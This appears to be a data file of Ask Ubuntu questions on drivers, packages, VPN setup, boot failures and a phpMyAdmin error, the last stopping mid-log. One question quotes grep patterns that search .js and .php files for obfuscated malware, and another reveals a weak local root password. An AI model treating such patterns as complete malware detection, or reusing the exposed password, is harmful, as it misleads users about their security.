325909	metax alternative for linux	i have used the metax program on my windows that works great for video , and was wondering if there was a linux video , mp4 , movie and tv show editor out there . i tried using easytag to do it , but it lacks the feature of letting me embed a poster image on the files .
325911	ca n't make intel hd 4000 drivers to work	after replacing my xserver with sudo apt-get remove -- purge xserver-xorg sudo apt-get install xserver-xorg sudo dpkg-reconfigure xserver-xorg i ca n't get my intel hd 4000 card to work in 12.04 . or to be more specific , i ca n't get teh effects that i had with unity working again . even changing workspaces looks ugly now . i 've searched this forum and googled everything about intel hd 4000 drivers + ubuntu but no luck . everything i found was about linux 13.04 . please help me . how to get my good looking system back ? i 've installed mesa-utils but system details still do n't recognize my graphics card .
325912	rollout plan for ubuntu touch on android devices	is there a plan in place for the roll-out of ubuntu touch for devices other than the nexus devices . as of now the entire development is done by volunteers picking up and working on certain devices , so i was wondering if this is going to continue or if there is a specific plan for the roll-out on other devices ?
325918	second hard drive not detected	i have an old hp pavilion dv9000 series laptop that i 've installed ubuntu 12.04 on . the laptop is large enough to have two hard drive bays . one has one of the two original samsung hard drives ( it 's the primary ) and the other has a newer western digital scorpio blue hard drive . ( both are sata ii by the way . ) before i installed ubuntu , the samsung drive had windows vista on it and i had formatted the wd drive in ntfs ( it 's blank right now ) . so when i first boot ubuntu , it shows a 250 gb filesystem ( the western digital drive ) in my file browser . but if i click on the link , it gives me an error message saying it had a problem mounting the device . then if i close the file browser and reopen it , the link is gone . i 've tried using gparted to find the device , but it does n't know it 's there either . the wd drive does n't even show up in the list of drives . is there anything else i can do to get ubuntu to detect the device ?
325919	stuck in broken packages cycle ( related to libreoffice / openoffice )	i have some broken packages after messing up libreoffice uninstall ( i installed apache openoffice , but it seems that i did n't fully remove lo first ) . below are some of the responses i get to various commands . simplest question first ... should i remove apache oo before continuing ? the first set here is just to show what is installed , and i think shows all of the broken lo packages : $ aptitude search '~i ' | grep libreoffice b libreoffice-emailmerge - transitional package for libreoffices emai b libreoffice-java-common - office productivity suite -- arch-independ i libreoffice-style-tango - office productivity suite -- tango symbol i openclipart-libreoffice - clip art for openoffice.org/libreoffice ga ca n't remove broken packages , or installed ones : $ sudo apt-get purge libreoffice-emailmerge reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libreoffice-java-common : depends : libreoffice-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . $ $ sudo apt-get purge openclipart-libreoffice reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libreoffice-emailmerge : depends : libreoffice-common ( > = 1:4.0.2~rc1 ) but it is not going to be installed libreoffice-java-common : depends : libreoffice-common but it is not going to be installed openclipart : depends : openclipart-libreoffice ( = 2.0-1ubuntu1 ) but it is not going to be installed openclipart-openoffice.org : depends : openclipart-libreoffice but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . the i try to fix broken packages : $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libclucene-contribs1 libclucene-core1 libcmis-0.3-3 libexttextcat-2.0-0 libexttextcat-data liblangtag-common liblangtag1 libreoffice-common libreoffice-core python-uno uno-libs3 ure suggested packages : libreoffice-style-crystal libreoffice-style-hicontrast libreoffice-style-human libreoffice-style-oxygen the following packages will be removed : libexttextcat0 the following new packages will be installed : libclucene-contribs1 libclucene-core1 libcmis-0.3-3 libexttextcat-2.0-0 liblangtag-common liblangtag1 libreoffice-common libreoffice-core python-uno the following packages will be upgraded : libexttextcat-data uno-libs3 ure 3 upgraded , 9 newly installed , 1 to remove and 6 not upgraded . 4 not fully installed or removed . need to get 61.5 mb of archives . after this operation , 209 mb of additional disk space will be used . get:1 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main ure amd64 4.1.0-0ubuntu1~precise1~ppa1 [ 1,910 kb ] get:2 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main uno-libs3 amd64 4.1.0-0ubuntu1~precise1~ppa1 [ 773 kb ] get:3 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libreoffice-common all 1:4.1.0-0ubuntu1~precise1~ppa1 [ 27.5 mb ] get:4 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libclucene-core1 amd64 2.3.3.4-2~precise1 [ 602 kb ] get:5 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libclucene-contribs1 amd64 2.3.3.4-2~precise1 [ 114 kb ] get:6 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libcmis-0.3-3 amd64 0.3.1-1ubuntu1~precise1 [ 318 kb ] get:7 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libexttextcat-data all 3.4.0-1~precise1 [ 193 kb ] get:8 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libexttextcat-2.0-0 amd64 3.4.0-1~precise1 [ 17.0 kb ] get:9 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main liblangtag-common all 0.5.1-2~precise2 [ 135 kb ] get:10 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main liblangtag1 amd64 0.5.1-2~precise2 [ 55.4 kb ] get:11 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main libreoffice-core amd64 1:4.1.0-0ubuntu1~precise1~ppa1 [ 29.5 mb ] get:12 http : //ppa.launchpad.net/libreoffice/ppa/ubuntu/ precise/main python-uno amd64 1:4.1.0-0ubuntu1~precise1~ppa1 [ 283 kb ] fetched 61.5 mb in 29s ( 2,104 kb/s ) ( reading database ... 1099753 files and directories currently installed . ) preparing to replace ure 3.5.7-0ubuntu4 ( using ... /ure_4.1.0-0ubuntu1~precise1~ppa1_amd64.deb ) ... unpacking replacement ure ... preparing to replace uno-libs3 3.5.7-0ubuntu4 ( using ... /uno-libs3_4.1.0-0ubuntu1~precise1~ppa1_amd64.deb ) ... unpacking replacement uno-libs3 ... unpacking libreoffice-common ( from ... /libreoffice-common_1 % 3a4.1.0-0ubuntu1~precise1~ppa1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.0-0ubuntu1~precise1~ppa1_all.deb ( -- unpack ) : trying to overwrite '/usr/bin/soffice ' , which is also in package openoffice-debian-menus 4.0-9702 rmdir : failed to remove `/var/lib/libreoffice/share/prereg/ ' : no such file or directory rmdir : failed to remove `/var/lib/libreoffice/share/ ' : directory not empty rmdir : failed to remove `/var/lib/libreoffice/program/ ' : no such file or directory rmdir : failed to remove `/var/lib/libreoffice ' : directory not empty rmdir : failed to remove `/var/lib/libreoffice ' : directory not empty processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for hicolor-icon-theme ... processing triggers for gnome-icon-theme ... processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.1.0-0ubuntu1~precise1~ppa1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have the lo ppa : ppa.launchpad.net/libreoffice/ppa/ubuntu should i remove it ? what can i try next ? is there a brute-force option ? like rm -f of the libreoffice directories ?
325927	problem installing openvpn on 13.04	so i am following this guide for help on getting openvpn installed and set up.everything appears to be going well until i reach this point.part right above simple server configuration that 's in bold . the part where he says to copy following files to the client using a secure method.i tried entering them in terminal as root but it comes up bash : /etc/openvpn/ca.crt : permission denied i have no idea what he means or where i should do it from so i would appreciate any help i can get . sorry i tried to add picture but do n't have the rep .
325928	while running dwarf fortress , command line gives me some error about file not found	so , i downloaded dwarf fortress linux edition , fired up terminal , decompressed the bz2 ( still in the downloads folder ) , cd ~/downloads/df_linux , then : ~/downloads/df_linux $ ./df ./df : 6 : ./df : ./libs/dwarf_fortress : not found ~/downloads/df_linux $ cd libs ~/downloads/df_linux/libs $ ls -al total 21408 -rwx -- -- -- 1 ***** ***** 15104448 jul 29 14:06 dwarf_fortress -rw-r -- r -- 1 ***** ***** 466491 jul 29 14:06 libgcc_s.so.1 -rwxr-xr-x 1 ***** ***** 1451966 jul 29 14:06 libgraphics.so -rwxr-xr-x 1 ***** ***** 4852343 jul 29 14:06 libstdc++.so.6 ~/downloads/df_linux/libs $ not found ? ? ? it is right there ! ! ! i even tried to copy the dwarf_fortress executable into ~/bin , then run dwarf_fortress on the command line : ~/downloads/df_linux/libs $ cd ~/bin ~/bin $ ls -la total 14788 -rwxr -- r -- 1 ***** ***** 243 jul 29 14:06 df -rwx -- -- -- 1 ***** ***** 15104448 jun 29 14:06 dwarf_fortress ~/bin $ df /home/*****/bin/df : 6 : /home/*****/bin/df : ./libs/dwarf_fortress : not found ~/bin $ dwarf_fortress bash : /home/*****/bin/dwarf_fortress : no such file or directory ~/bin $ again , the same problem . something is wrong with this anyways , if you have been wondering , i ran touch * on the files , and did n't include all stuff in my ~/bin , and export ps1='/w $ ' in my .bashrc how i tried to fix it since it tells me that it ca n't find the exeutable , i edited the last line form ./libs/dwarf_fortress to the full path , same error . then , i tried removing everything but the export command and the execute command ( which i changed to the full path to my executable ) and same error . some reply ( s ) told me to post the md5sum , it is 33e26a93e5914f7545fa1aaa53706eeb
325929	malware and backdoor detection shell script	i 'm trying to build a shell script which can automatically detect malware , backdoors and rootkits and i 'm trying to research for it . i found some of the things like find . -name “*.js” | xargs grep -l “eval ( unescape” find . -name “*.php” | xargs grep -l “eval ( base64_decode” but i dont find only these relevant to just find for .php and .js files and try to see if it consists of malware . can anyone please help me to give a general idea that i can use for the script so that it can do the work of malware , backdoors and rootkits detection . more precisely to say how can one find these malwares , backdoors and rootkits on a ubuntu system . thanks .
325932	ubuntu 13.04 wo n't boot after last updates	yesterday i was proposed by ubuntu to download and install some updates and i agreed . after the download of this updates he told me that there was something incomplete and asked me whether to go on with the installation or to stop . i told him to go on and there where no problems . yesterday night i turned off the system and this morning i can not boot anymore ubuntu . i 've in dual boot windows and i can go into windows but not into ubuntu . i can start it only in recovery mode but from there i can not even use the low-graphics mode . i already tried to make him repair the damaged packages but i had't success . only thing i can do is to go into the shell with root privileges . how can i fix the problem ? i really need to make it work because i have all my thesis work in the ubuntu partition .
325933	internal server error on phpmyadmin log in	i have installed phpmyadmin successfully from here . i could do login into that without any problems before restarting machine . after restarting machine , when i 'm going to localhost/phpmyadmin and enter the user ( root ) and its password ( 123456 ) , it get me : 500 internal server error i have no idea what't wrong with that ! any help would be appreciated . edit : { add more informations } var/log/apache2/error.log [ sun jul 28 11:41:50 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.7 with suhosin-patch configured -- resuming normal operations [ sun jul 28 12:53:22 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:53:22 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:53:26 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:53:26 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:53:32 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:53:32 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:53:38 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:53:38 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ sun jul 28 12:54:10 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:54:10 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:54:10 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:54:52 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:54:52 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:55:34 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:55:34 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:55:34 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ sun jul 28 12:56:00 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:56:12 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 12:56:17 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ sun jul 28 13:54:49 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:06:19 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ sun jul 28 14:06:24 2013 ] [ error ] [ client 127.0.0.1 ] php warning : mysql_fetch_assoc ( ) expects parameter 1 to be resource , boolean given in /home/hamed/public_html/php_selectquery/index.php on line 14 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:06:45 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ sun jul 28 14:06:46 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:06:46 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:06:46 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:06:46 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:06:52 2013 ] [ error ] [ client 127.0.0.1 ] php warning : mysql_fetch_assoc ( ) expects parameter 1 to be resource , boolean given in /home/hamed/public_html/php_selectquery/index.php on line 14 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ sun jul 28 14:06:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:06:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:06:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:06:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:07:53 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ sun jul 28 14:07:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:07:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:07:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:07:54 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:23 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:23 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:23 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:23 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:32 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ sun jul 28 14:08:33 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:33 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:33 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:08:33 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:09:39 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ sun jul 28 14:09:41 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:09:41 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:09:41 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:09:41 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:09:44 2013 ] [ error ] [ client 127.0.0.1 ] php warning : mysql_fetch_assoc ( ) expects parameter 1 to be resource , boolean given in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ sun jul 28 14:09:48 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:09:48 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:09:48 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:09:48 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : food in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php ? healthy=unhealthy [ sun jul 28 14:10:28 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ sun jul 28 14:10:29 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:10:29 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:10:29 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ sun jul 28 14:10:29 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ sun jul 28 14:33:35 2013 ] [ notice ] caught sigterm , shutting down failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ mon jul 29 01:09:32 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.7 with suhosin-patch configured -- resuming normal operations failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ mon jul 29 01:27:40 2013 ] [ notice ] caught sigterm , shutting down failed loading /usr/lib/php5/20090626+lfs/xdebug.so : /usr/lib/php5/20090626+lfs/xdebug.so : can not open shared object file : no such file or directory [ mon jul 29 10:22:19 2013 ] [ notice ] apache/2.2.22 ( ubuntu ) php/5.3.10-1ubuntu3.7 with suhosin-patch configured -- resuming normal operations [ mon jul 29 10:49:19 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ mon jul 29 10:49:19 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 10:55:21 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ mon jul 29 10:55:21 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 11:02:41 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ mon jul 29 11:02:42 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 11:02:42 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 11:21:41 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ mon jul 29 11:21:42 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 11:21:42 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 11:22:58 2013 ] [ error ] [ client 127.0.0.1 ] ( 2 ) no such file or directory : could not open password file : /path/to/passwords/.htpasswd [ mon jul 29 11:22:58 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 11:22:58 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico [ mon jul 29 12:01:08 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:01:08 2013 ] [ error ] [ client 127.0.0.1 ] file does not exist : /home/hamed/public_html/favicon.ico , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:01:12 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:01:12 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:01:12 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:01:12 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : name in /home/hamed/public_html/php_selectquery/index.php on line 16 , referer : http : //localhost/php_selectquery/index.php [ mon jul 29 12:01:15 2013 ] [ error ] [ client 127.0.0.1 ] php warning : mysql_fetch_assoc ( ) expects parameter 1 to be resource , boolean given in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : //localhost/php_selectquery/index.php ? healthy=healthy [ mon jul 29 12:02:37 2013 ] [ error ] [ client 127.0.0.1 ] php notice : undefined index : healthy in /home/hamed/public_html/php_selectquery/index.php on line 2 [ mon jul 29 12:02:38 2013 ] [ error ] [ client 127.0.0.1 ] php warning : mysql_fetch_assoc ( ) expects parameter 1 to be resource , boolean given in /home/hamed/public_html/php_selectquery/index.php on line 15 , referer : http : 